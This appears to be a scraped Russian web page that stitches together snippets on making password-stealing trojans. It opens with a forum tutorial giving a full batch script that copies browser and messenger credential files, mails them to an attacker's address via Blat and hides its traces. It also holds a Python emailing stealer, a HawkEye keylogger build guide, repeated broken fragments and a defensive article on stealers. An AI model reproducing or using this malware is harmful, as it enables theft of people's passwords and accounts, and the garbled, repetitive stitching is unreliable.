Вирус для кражи паролей – банковские трояны для беспечных пользователей / Информационная безопасность / iXBT Live

Содержание

Пример Простого Bat Вируса,ворующего Файлы С Паролями.

  1. В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
    Начнём с того что вирус будет написан на bat'e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- "командной строки".
    Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
    Открываем блокнот и копируем туда следующий код:

    Код:

    @echo off
    md %systemroot%\wincs
    md %SystemDrive%\pass\
    md %SystemDrive%\pass\opera\
    md %SystemDrive%\pass\Mozilla\
    md %SystemDrive%\pass\MailAgent\
    md %SystemDrive%\pass\MailAgent\reg
    attrib %systemroot%\wincs +h +s +r
    attrib %SystemDrive%\pass +h +s +r
    copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"
    copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"
    copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"
    CD /D %APPDATA%\Opera\Opera\
    copy /y wand.dat %SystemDrive%\pass\opera\wand.dat
    copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da
    regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
    regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
    CD /D %APPDATA%
    Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
    Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul
    cd %AppData%\Mozilla\Firefox\Profiles\*.default\
    copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite
    copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db
    copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite
    copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul
    del /s /q %SystemRoot%\Rar.exe
    %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\
    copy /y  %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar
    cd %systemroot%\wincs
    %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль
    ren *.rar pass.rar
    %systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar
    rmdir /s /q %SystemDrive%\pass
    rmdir /s /q %systemroot%\wincs
    del /s /q %systemroot%\blat.exe
    del /s /q %systemroot%\blat.dll
    del /s /q %systemroot%\blat.lib
    attrib +a +s +h +r %systemroot%\wind.exe
    EXIT
    cls
    Не много распишу код самого батинка.
    @echo off - скрывает тело батинка( так то она и не нужна,ну всё же)
    md %systemroot%\wincs - создаёт папку wincs в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.
    md %SystemDrive%\pass\ - создаёт папку pass на диске куда установлена система Windows.
    md %SystemDrive%\pass\opera\ - создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat )
    md %SystemDrive%\pass\Mozilla\ - создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite,key3.db,signons.sqlite) в которых храняться пароли.
    md %SystemDrive%\pass\MailAgent\ - создаёт папку MailAgent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра( хранящие в себе пароли) от Маил Агента.
    md %SystemDrive%\pass\MailAgent\reg - создаёт папку reg
    attrib %systemroot%\wincs +h +s +r - ставит атрибуты на папку wincs тем самым скрывая её от глаз.
    attrib %SystemDrive%\pass +h +s +r - тоже самое что и выше.
    copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - копирует файл blat.exe с места выгрузки в папку wincs
    copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - копирует файл blat.dll с места выгрузки в папку wincs
    copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - копирует файл blat.lib с места выгрузки в папку wincs
    CD /D %APPDATA%\Opera\Opera\ - переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.
    copy /y wand.dat %SystemDrive%\pass\opera\wand.dat - копирует файл wand.dat в папку opera
    copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat - копирует файл cookies4.dat в папку opera
    regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 - экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
    regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 - экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
    CD /D %APPDATA% - переходим в папку AppData
    Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul - копирует содержимое папки Mra\Base в папку MailAgent
    Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul - копирует файл ver.txt в папку MailAgent
    cd %AppData%\Mozilla\Firefox\Profiles\*.default\ - переходим в папку с профилем браузера Мозилы
    copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite - копирует файл cookies.sqlite в папку Mozilla
    copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db - копирует файл key3.db в папку Mozilla
    copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite - копирует файл signons.sqlite в папку Mozilla
    copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul - копирует компонент архиватора WinRar Rar.exe в папку pass
    del /s /q %SystemRoot%\Rar.exe - удаляет компонент архиватора из папки Windows
    %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- архивируем содержимое папки pass
    copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
    cd %systemroot%\wincs - переходим в папку wincs
    %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль - готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
    ren *.rar pass.rar - на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
    %systemroot%\wincs\blat.exe -body Files Password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar - указываем на какой почтовый адрес будет послано письмо и отсылаем его.
    rmdir /s /q %SystemDrive%\pass - удаляем папку pass
    rmdir /s /q %systemroot%\wincs - удаляем папку wincs
    del /s /q %systemroot%\blat.exe - удаляем компоненты Blat из папки Windows.
    del /s /q %systemroot%\blat.dll - удаляем компоненты Blat из папки Windows.
    del /s /q %systemroot%\blat.lib - удаляем компоненты Blat из папки Windows.
    attrib +a +s +h +r %systemroot%\wind.exe - ставим на себя атрибуты тем самым скрываем себя от глаз.
    EXIT - завершаем процесс батинка и выходим.
    cls - очищаем вывод каких либо строк в интреператоре.
    Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter ,далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно здесь) и склеиваем в один исполняемый файл,или же с какой нибудь программой, путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir%.
    В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью multi-password-recovery ,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
    На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте.
    Спасибо за внимание,всего доброго!
    ©SwAp TheHackWorld.in

     

  2. объясните мне как склеять компоненты программы блат и архиватора вин рар...и путь выгрузки как? просто я здесь первый раз...

     

  3. у меня не чего не выходит,и с прогой blat непонятно как она работает,ты сам то испытывал?

     

Поделиться этой страницей

Пример трояна для кражи паролей с компьютера

import smtplib                                              

import os                                                  

 

import mimetypes                                            

from email import encoders                                  

from email.mime.base import MIMEBase                        

from email.mime.text import MIMEText                        

from email.mime.image import MIMEImage                      

from email.mime.audio import MIMEAudio                      

from email.mime.multipart import MIMEMultipart              

 

def send_email(addr_from, password, addr_to, files):                            

 

    msg_subj = 'Password'

    msg_text = 'Password'

    msg = MIMEMultipart()                                  

    msg['From']    = addr_from                              

    msg['To']      = addr_to                                

    msg['Subject'] = msg_subj                              

 

    body = msg_text                                        

    msg.attach(MIMEText(body, 'plain'))                    

 

    process_attachement(msg, files)

 

    #==========Код зависящий от сервиса==========

    server = smtplib.SMTP('smtp.gmail.com', 587)

    server.starttls()

    server.login(addr_from, password)

    server.send_message(msg)

    server.quit()

        #============================================

 

def process_attachement(msg, files):                        

    for f in files:

        if os.path.isfile(f):                              

            attach_file(msg,f)                              

        elif os.path.exists(f):                            

            dir = os.listdir(f)                            

            for file in dir:                                

                attach_file(msg,f+"/"+file)                

 

def attach_file(msg, filepath):                            

    filename = os.path.basename(filepath)                  

    ctype, encoding = mimetypes.guess_type(filepath)        

    if ctype is None or encoding is not None:              

        ctype = 'application/octet-stream'                  

    maintype, subtype = ctype.split('/', 1)                

    if maintype == 'text':                                  

        with open(filepath) as fp:                          

            file = MIMEText(fp.read(), _subtype=subtype)    

            fp.close()                                      

    elif maintype == 'image':                              

        with open(filepath, 'rb') as fp:

            file = MIMEImage(fp.read(), _subtype=subtype)

            fp.close()

    elif maintype == 'audio':                              

        with open(filepath, 'rb') as fp:

            file = MIMEAudio(fp.read(), _subtype=subtype)

            fp.close()

    else:                                                  

        with open(filepath, 'rb') as fp:

            file = MIMEBase(maintype, subtype)              

            file.set_payload(fp.read())                    

            fp.close()

            encoders.encode_base64(file)                    

    file.add_header('Content-Disposition', 'attachment', filename=filename)

    msg.attach(file)                                        

 

#=====Настройки=================================

_from = "[email protected]"

_password = "password"

_to   = "[email protected]"                                

files = ["pass.txt"]                                    

#=============================================

 

send_email(_from, _password, _to, files)

Как сделать вирус, ворующий пароли: 17 шагов / Информпедия


Первым делом вам нужно определиться, через какую программу вы будете делать вирус. Я делал через программу HawkEyeKeylogger (почему делал, ответ будет в конце статьи). Итак, скачиваем эту программу на каком-нибудь сайте. Когда скачали, отключаем антивирус, так как эта программа сама вирусная.

1. Запускаем программу у меня дизайн такой (http://i.imgur.com/9tqPgpg.png).

2. Переходим во вкладку Delivery (http://i.imgur.com/1LljdkD.png).

3. Сворачиваем программу и идём на этот сайт, для создания своего сайта hostinger.ru или любой платный хостинг.

4. Создаём аккаунт, в правом верхнем углу, или входим через Facebook или Google+.

5. После того как зарегистрировались создаём новый аккаунт, уже на своём профиле (http://i.imgur.com/z7o6nuO.png).

6. Выбираем тарифный план Бесплатный и жмём заказать.

7. Заполняем поля (http://i.imgur.com/ga6rRfu.png), вот как я заполнил (http://i.imgur.com/UIhDSFd.png), жмём продолжить, подтверждаем что вы не робот, и заказать.

8. Переходим на наш сайт (http://i.imgur.com/7D4Hijg.png).

9. Теперь вы должны взять на заметку эти строки (http://i.imgur.com/UNvw2TV.png). Переходим на ваш сайт, он находится в зелёной рамочке на скриншоте. И у вас должен быть такой дизайн (http://i.imgur.com/Eo2yp7p.png).

10. Возвращаемся в нашу программу. И заполняем как на скриншоте (http://i.imgur.com/Sg785J4.png). 1. Вставляем ваш IP АДРЕС с пункта 9. (1 скриншот). 2. ИМЯ ПОЛЬЗОВАТЕЛЯ. 3. Ваш пароль, который вы указывали при создании сайта, не аккаунта.

11. Переходим в Option #1 и ставим всё как на скриншоте (http://i.imgur.com/oEyoczo.png). 1. Какие пароли сворует программа. 2. Запуск от имени администратора. 3. Удаление программы после запуска.

12. Option #2 и Option #3 пропускаем.

13. Переходим в Option #4. В этом разделе можно выбрать иконку вашего вируса. Скачайте для себя любую иконку с расширением .ico и жмём (http://i.imgur.com/cbIygv9.png) и выбираем вашу иконку.

14. Option #5 пропускаем.

15. И переходи в Build. Ставим галочку, напротив, I Agreed The TOS и жмём Build.

16. Сохраняем.

17. Вам нужно подождать 24 часа. Зачем, спросите вы. Для того чтобы программа не закрыла сайт. Если вы сейчас запустите ваш вирус, то ваш сайт на хостинге блокируется. Или же вы можете попробовать запустить ваш вирус и через 1-3 минуты обновить ваш сайт. И там под файлом Default должен появиться ещё один файл. Вы на его жмёте и он загружается, или открывается в новой вкладке. И там будут все пароли.

На этом всё. Сейчас расскажу кратко в чём я имел в виду: я делал через программу HawkEyeKeylogger (почему делал, ответ будет в конце статьи.

Всё это карается статьями Уголовного Кодекса Российской Федерации. Вот некоторые: Статья 273 — распространение вируса наказываются лишением свободы на срок от трех до семи лет. Статья 138 Уголовного Кодекса часть 1 (нарушение тайны переписки) и часть 1 статьи 272 Уголовного Кодекса (неправомерный доступ к компьютерной информации). До 2 лет тюрьмы, причем не условно.

Так что всё продумываете перед взломом или бросайте это дело.

Вирус для кражи паролей

Как вирус ворует пароли на компе

Мы делаем следующие действия 1)Заходим в панель управления 2)Выбираем раздел Параметр папок, Далее в открывшимся окне щелкаем вкладку Вид и ставим Помечаем в Самом низу ПОКАЗЫВАТЬ СКРЫТЫЕ ФАЙЛЫ, ПАПКИ И ДИСКИ . ЖМЕМ ПРИМЕНИТЬ )))ДАЛЕЕ ОПЯТЬ ЗАХОДИМ C:\WINDOWS\system32\drivers\etc И ВОТ ЧУДО ВИДИМ ДВА hosts ФАЙЛА) )

Троян-вымогатель CryptXXX научился воровать пароли

Список приложений, за паролями которых охотится StillerX, разнообразен. В нём, среди прочего, фигурируют популярные браузеры, менеджеры закачки, почтовые программы, клиенты FTP и VPN. Кроме того, модуль способен достать пароли из кэша WNetEnum и диспетчера учётных данных Microsoft (Credential Manager).

Как создать свой вирус троян для кражи пароля в блокноте

Школа Хакеров — Сделать вирус легко и просто 2020 Школа Хакеров — Сделать вирус легко и просто 2020 Пароль на АРхив: 123 Скачать — hттрs://сlоud.маil.ru/рubliс/КG75/rjхкUwЕт9 hттр://vк.сом. Делаем безвредный стиллер | Воруем пароли hттрs://vк.сом/zаеbаli_турbiе_lуdi — участвовал в видео Необходимые файлы : hттрs://уаdi.sк/d/мСа8S_мМ32НхQV hттр://rghо.

Инструкция взлома — Это пособия для безопасности

Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter (скачать) (о том как скомпилировать и не только можно прочитать здесь),далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно здесь) и склеиваем в один исполняемый файл,или же с какой нибудь программой ( об этом можно прочитать здесь), путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir% .

3 — троян, ворующий логины и пароли пользователей — ВКонтакте

Для получения доступа к заявленному функционалу плеера, пользователям необходимо войти в свою учетную запись, введя логин и пароль. После авторизации Android.PWS.Vk.3 предоставляет владельцу мобильного устройства заявленный функционал, однако одновременно с этим незаметно передает введенные данные на управляющий сервер, в результате чего злоумышленники получают доступ к аккаунту жертвы.

Записки молодого админа

Снова запустил Autoruns и AVZ4 и повторил те действия, которые делал до запуска трояна. После чего перезагрузился в безопасный режим и снова повторил эти действия. Далее скинул полученные файлы-отчеты себе на хоста машину (Linux Ubuntu 9.10 Desktop) и уже на ней произвел анализ этих логов (отчетов).

Трояны №9

Антивирус Stealer — эту программу разархивировать, скопировать на флешку 2 файла и папку(Антивирус.bat,autorun.inf,prog) и можно ходить с флешкой по друзьям! Вставляешь флешку в комп, нажимаешь Антивирус.bat, как он остановиться можно закрывать и доставать флешку, все пароли какие есть в компе у вас на флешке, они будут храниться в папке «prog»—>»log».

Как создать свой вирус троян для кражи пароля

В общем поржал немного и скачал эту дрянь . Уж очень захотелось вспомнить студенческие года, когда изучал вирусы. Да и почитывая блог другана порой накаляет меня — это же как охота на дичь . Троянская программа mvk.exe не попадает на компьютер без ведома пользователя, как это бывает с другими.

Как создать файл ворующий пароли

Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь. Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.

Как создать свой вирус троян для кражи пароля

Как создать троян для кражи паролей.Троян open=»Имя вашего БАТника» copy /y AppData%\Mozilla\Firefox\Profiles\*ult % cd %localappdata%\Google\Chrome\User Data\Default copy /y «%localappdata%\Google\Chrome\User Data\Default\Login Data» «% Исходник самой програмки:KM8oq8 НОВЕЙШАЯ ВЕРСИЯ 2020 ГОДА(ПЕРЕЗАЛИТА ) ссылка на сниффер sniffer/

Вирус для кражи паролей

Лучшая банановая программа — Boot UI Tuner Boot UI Tuner это уловка, позволяющая настроить загрузочное хобби для регистрационной системы Windows 8, которая позволит Вам быстро переключать меню загрузки Кодеки Media Player Codec Pack для Media Windows Media Player Codec Pack это факт различных кодеков заглублённых для стандартного проигрывателя Windows Media, который попросит Вам с легкостью просматривать Мои видеозаписи.

Как создать свой вирус троян для кражи пароля

Пару дней назад мне на стенке в контакте один из друзей оставил граффити с сообщением, что он взломал мой аккаунт, т.ж. там была ссылка на сайта vk-****.msk.ru. Ну да. Еще бы. ) Ему я сразу отписал, чтобы полечил себя да пароль сменил. Но вот ссылка меня все же заинтересовала, хотя я точно знал, что это троян (именно он меня и заинтересовал).

Как создать свой вирус троян для кражи пароля

Вирус для кражи паролей md %SystemDrive%\pass\opera\ — создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat ) md %SystemDrive%\pass\Mozilla\ — создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite,key3.db,signons.sqlite) в которых храняться.

Создаем троян для кражи пароля

В одном столбце троян для кражи пароля в контакте блокирует игру на PS3. Для кражи троян пароля и распознанный материал для кражи учитывают географические координаты владельца. Учитывая действия пользователя, троян пароля позволяет персонализировать отображение для общения в системе.

Как создать троян вирус для кражи паролей

Программы-чтения паролей. Это программы, которые умеют считывать любой текст, набранный пользователем на клавиатуре, который впоследствии отправляют на адрес почты взломщика. Например, кейлогеры различных классификаций. Программы-подбора паролей. Это программы, которые путем перебора различных комбинаций подбирают пароль. Распространенным примером этой программы является брутфорс. Программа широко распространена в интернете и ее легко можно скачать в открытом доступе бесплатно.

Троян-вымогатель CryptXXX научился воровать пароли

Троян-вымогатель CryptXXX научился воровать пароли

Это, конечно, наиболее радикальный вариант. Часто в этом файле есть записи, которые оставлены вполне благонадежными программами. Так что, теоретически, можно удалить не все записи. Найдите среди записей этого файла те, которые содержат адреса сайтов на которые невозможно попасть, и сотрите именно эти строки.

Кража конфиденциальной информации.Очень часто главной целью вирусной атаки является кража конфиденциальной информации — такой как номера кредитных карт, различные пароли, секретные документы. То есть после инфицирования вирус ищет файлы, содержащие информацию, для кражи которой он предназначен, и передает ее хозяину. Это может происходить путем отправки выбранных данных в электронном сообщении на определенный адрес или прямой пересылки их на удаленный сервер.

Переходим на наш сайт http: Теперь вы должны взять на заметку эти строки http: Переходим на ваш сайт, он находится в зелёной рамочке на скриншоте. И у вас должен быть такой дизайн http: Возвращаемся в нашу программу. И заполняем как на скриншоте http: Ваш пароль, который вы указывали при создании сайта, не аккаунта. Переходим в Option 1 и ставим всё как на скриншоте http: Какие пароли сворует программа.

Мы делаем следующие действия 1)Заходим в панель управления 2)Выбираем раздел Параметр папок, Далее в открывшимся окне щелкаем вкладку Вид и ставим Помечаем в Самом низу ПОКАЗЫВАТЬ СКРЫТЫЕ ФАЙЛЫ, ПАПКИ И ДИСКИ . ЖМЕМ ПРИМЕНИТЬ )))ДАЛЕЕ ОПЯТЬ ЗАХОДИМ C:WINDOWSsystem32driversetc И ВОТ ЧУДО ВИДИМ ДВА hosts ФАЙЛА) )

Троян-вымогатель CryptXXX научился воровать пароли

Список приложений, за паролями которых охотится StillerX, разнообразен. В нём, среди прочего, фигурируют популярные браузеры, менеджеры закачки, почтовые программы, клиенты FTP и VPN. Кроме того, модуль способен достать пароли из кэша WNetEnum и диспетчера учётных данных Microsoft (Credential Manager).

Как создать троян вирус для кражи паролей

Антивирус Stealer — эту программу разархивировать, скопировать на флешку 2 файла и папку(Антивирус.bat,autorun.inf,prog) и можно ходить с флешкой по друзьям! Вставляешь флешку в комп, нажимаешь Антивирус.bat, как он остановиться можно закрывать и доставать флешку, все пароли какие есть в компе у вас на флешке, они будут храниться в папке «prog»—{amp}gt;»log».

В общем поржал немного и скачал эту дрянь . Уж очень захотелось вспомнить студенческие года, когда изучал вирусы. Да и почитывая блог другана порой накаляет меня — это же как охота на дичь . Троянская программа mvk.exe не попадает на компьютер без ведома пользователя, как это бывает с другими.

Вирус для кражи паролей md %SystemDrive%passopera — создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat ) md %SystemDrive%passMozilla — создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite,key3.db,signons.sqlite) в которых храняться.

В одном столбце троян для кражи пароля в контакте блокирует игру на PS3. Для кражи троян пароля и распознанный материал для кражи учитывают географические координаты владельца. Учитывая действия пользователя, троян пароля позволяет персонализировать отображение для общения в системе.

Троян обыкновенный – один из легких вариантов проникновения, но и имеющий слабый функционал по сравнению с backdoor. Как правило, чтобы заполучить доступ к чужому компьютеру, засылают первоначально трояна обыкновенного. В основном он скрывается в javascript файлах на различных не совсем честных сайтах.

blat.exe -bоdу PassReg -to кому отправлять -attach pass.mpf заходим на вкладку include нажимаем на кнопку add и выбераем файлы Но всё-равно спасибо. мне кажется это нереально. ну если не так то не обессудьте Замечательно, любой антивирус его убьет. Но всё-равно спасибо. Согласен!

В кривых руках может загубить систему. VirtualBox — виртуальная машина, на ней я исследовал запускал вирус. Для начала запустил Autoruns, подождал пока он отработает и сохранил список. Потом перешел к AVZ4. В нем задействовал функции «Исследование системы», «Резервное копирование» и «Ревизор».

Как вирус ворует пароли на компе

Преступник может заразить компьютер вирусом, устанавливающим программу «троянский конь», который затем посылает данные с вашего компьютера хозяину вируса. Если на компьютере содержатся данные о ваших счетах, то преступник сможет снять деньги с ваших банковских счетов и открыть кредитные карты под вашим именем.

Троян-вымогатель CryptXXX научился воровать пароли

В России и на Украине обнаружена первая в мире вредоносная программа, которая может причинять финансовый ущерб владельцам банковских карт. Вирус-троян позволяет злоумышленникам воровать денежные средства из банкоматов Diebold. Производитель банкоматов уверяет, что уязвимость устранена. Антивирусные компании Sophos.

Как вирусы воруют данные из браузеров

Большинство браузеров предлагает сохранить вашу информацию: логины и пароли от аккаунтов, данные банковской карты, которой вы расплачиваетесь в интернет-магазинах, имя, фамилию и номер паспорта при покупке билетов и так далее. Это удобно: вы можете сэкономить кучу времени на заполнении одинаковых форм и не беспокоиться о забытых паролях. Однако есть один нюанс: все эти данные могут достаться злоумышленникам, если на вашем компьютере заведется стилер — зловред, крадущий информацию, в том числе из браузера.

Популярность таких программ среди интернет-мошенников в последнее время растет: только за первую половину этого года продукты «Лаборатории Касперского» обнаружили свыше 940 тысяч атак стилеров. Это на треть больше, чем за тот же период 2018-го.

Строго говоря, стилеров интересуют не только те данные, которые сохранены в браузерах, — также они крадут данные криптокошельков, игровых площадок и файлы с рабочего стола (надеемся, что вы не храните в них ценную информацию вроде списка паролей).

Однако браузеры превратились в хаб для личной жизни, работы и шопинга, и зачастую оттуда можно позаимствовать куда больше конфиденциальных сведений, чем из других программ. Давайте разберемся, как стилеры добираются до сохраненных в браузере данных.

Как браузеры хранят ваши данные

Разработчики браузеров стремятся защитить информацию, которую им доверили. Для этого они шифруют информацию, а расшифровать ее можно только на том устройстве и из того аккаунта, в котором вы эту информацию сохранили. Так что если просто украсть файл с данными автозаполнения, то воспользоваться им не получится — в нем все надежно зашифровано.

Однако есть один нюанс. По умолчанию разработчики браузеров предполагают, что свои устройство и аккаунт вы хорошо защитили, поэтому программа, запущенная с вашего аккаунта на вашем компьютере, может без проблем достать и расшифровать сохраненные данные. Ведь она действует как бы от вашего имени. К сожалению, это относится и к зловреду, проникшему на устройство и запущенному под вашей учетной записью.

Единственный браузер, предлагающий дополнительную защиту сохраненной информации от посторонних, — это Firefox: в нем можно создать мастер-пароль, без ввода которого данные расшифровать не получится даже на вашем компьютере. Однако эта опция по умолчанию отключена.

Как стилеры воруют данные из Chrome

Google Chrome и другие браузеры на движке Chromium — например, Opera или Yandex.Браузер — всегда хранят данные пользователя в одном и том же месте, поэтому стилеру не составит проблем их найти. В теории эти данные хранятся в зашифрованном виде. Однако если зловред уже проник в систему, то все его действия происходят как бы от вашего имени.

Поэтому зловред просто вежливо просит специальную систему браузера, отвечающую за шифрование сохраненной на компьютере информации, расшифровать эти данные. Поскольку такие запросы от лица пользователя по умолчанию считаются безопасными, в ответ стилер получит ваши пароли и данные кредиток.

Объявление на форуме о продаже трояна-стилера. Источник: Securelist

Как стилеры воруют данные из Firefox

Firefox работает немного иначе: чтобы спрятать базу данных с паролями и прочим от посторонних, браузер создает для нее профиль со случайным именем, поэтому зловред не может заранее знать, где ее искать. Однако само название файла с сохраненными данными не меняется. Поэтому ничто не мешает стилеру перебрать все профили (ведь папки с ними собраны в одном месте) и опознать нужный файл.

После этого зловред опять-таки попросит соответствующий модуль браузера расшифровать файлы и тоже добьется успеха — ведь он действует якобы от вашего имени.

Как стилеры воруют данные из Internet Explorer и Edge

Родные браузеры Windows используют для ваших данных специальные хранилища. В разных версиях программ методы защиты вашей информации и сами хранилища различаются, но их надежность все равно оставляет желать лучшего: в этом случае зловред тоже без труда получит ваши пароли и данные кредиток, запросив их у хранилища от вашего имени.

Одним словом, проблема одинакова для всех браузеров и заключается в том, что расшифровку сохраненных в браузере данных зловред запрашивает как бы от имени пользователя, поэтому у браузера нет никаких оснований ему отказать.

Что станет с украденными стилером данными?

Заполучив пароли и другую информацию из браузера в открытом виде, зловред отправит ее своим хозяевам. Дальше возможны два варианта: либо создатели зловреда воспользуются ею сами, либо, что более вероятно, продадут на черном рынке другим киберпреступникам — такой товар всегда в цене.

Так или иначе, если среди сохраненной информации были ваши логины и пароли, то у вас, скорее всего, угонят парочку аккаунтов и попытаются развести на деньги ваших друзей. Если вы хранили в браузере данные банковских карт, убытки могут оказаться более прямыми — ваши деньги потратят или переведут на свои счета.

Также краденные аккаунты могут использоваться со множеством других целей — от распространения спама и раскрутки сайтов или приложений, до рассылки вирусов и отмывки денег, украденных у других людей (и если этой активностью заинтересуется полиция, то с вопросами придут к вам).

Как защитить данные от стилеров

Как видите, если зловред проник на ваш компьютер, сохраненные в браузере данные, а вместе с ними ваши финансы и репутация оказываются под угрозой. Чтобы избежать такой ситуации:

  • Не доверяйте браузеру хранение важной информации вроде данных банковских карт — вводить их каждый раз вручную хоть и дольше, но гораздо безопаснее. А пароли можно хранить в менеджере паролей. Например, встроенный менеджер паролей есть в Kaspersky Total Security.
  • Если вы пользуетесь Firefox, можете на всякий случай защитить сохраненные в браузере данные мастер-паролем. Для этого щелкните на три полоски в правом верхнем углу браузера и выберите Настройки, перейдите на вкладку Приватность и защита, промотайте вниз до блока Логины и пароли и поставьте галочку Использовать мастер-пароль. Браузер попросит вас придумать этот пароль — чем длиннее и сложнее он будет, тем труднее будет злоумышленникам его подобрать.
  • И самое главное: лучший способ сберечь данные — это не дать зловреду проникнуть на ваш компьютер. Тогда он точно не сможет ничего у вас выудить. Для этого установите надежное защитное решение, которое не пропустит заразу на ваш компьютер. Нет зловреда — нет проблемы!

Можно ли сделать ссылку, по котороый будут вороваться пароли?

Угу, а ещё, чтобы она сама себя расспространяла, сама себя в дальнейшем дописывала, чтобы умела обходить блокировку. И шлюх с героином на дом вызывала.

Это совсем идеал)))

Как такое создаётся?

Никак.

Немного своей головой надо подумать и понять, что такое сделать нельзя.
Это вариант со ВСЕМИ паролями.

Абсолютно точно можно украсть Cookie с сайта и я думаю, что если в браузере включено автозаполнение полей логина/пароля можно украсть и эти данные.
Но для варианта выше требуется наличие XSS уязвимости на сайте. В данном случае копать в сторону: GET запросы, JS, поверхностные знания PHP.

У меня есть подозрение что это нужно прописать в коде, что бы скачивались определённые файлы жертвы

Это уже называется вредоносное ПО. Но стоит понимать, что оно само по себе не запускается. Без СИ в данном случае никак.

А то что вам кинули

Можешь вот тут об этом почтитать:

Скрыто от гостей

это очень полезная, но сложно-доступная штука.
Описание:

Код:

Трафик направляется на связку эксплоитов.
Там происходит анализ каждого нового посетителя.
Определяется его браузер, версии установленных плагинов,
вероятные уязвимости и затем перенаправление на страницу со специально сформированным кодом.
Браузер исполняя код подвергается атаке на переполнение и исполняет Шелл-код.
Далее Шелл-код загружает на компьютер жертвы исполняемый файл (вирус/лоадер и т.д.) и запускает его.
НО. Рабочие связки вы вряд ли найдете в бесплатном доступе. Точнее я даже сомневаюсь, что вы их за платно получите. А если и получите придется очень много денег отвалить.
Впрочем в той статье, которую вам кинули есть цены. Так же учитываем скаммеров, без них никуда.

А просто скинуть ссылку и получить пароли - это ваши сны.

 

Добавить комментарий

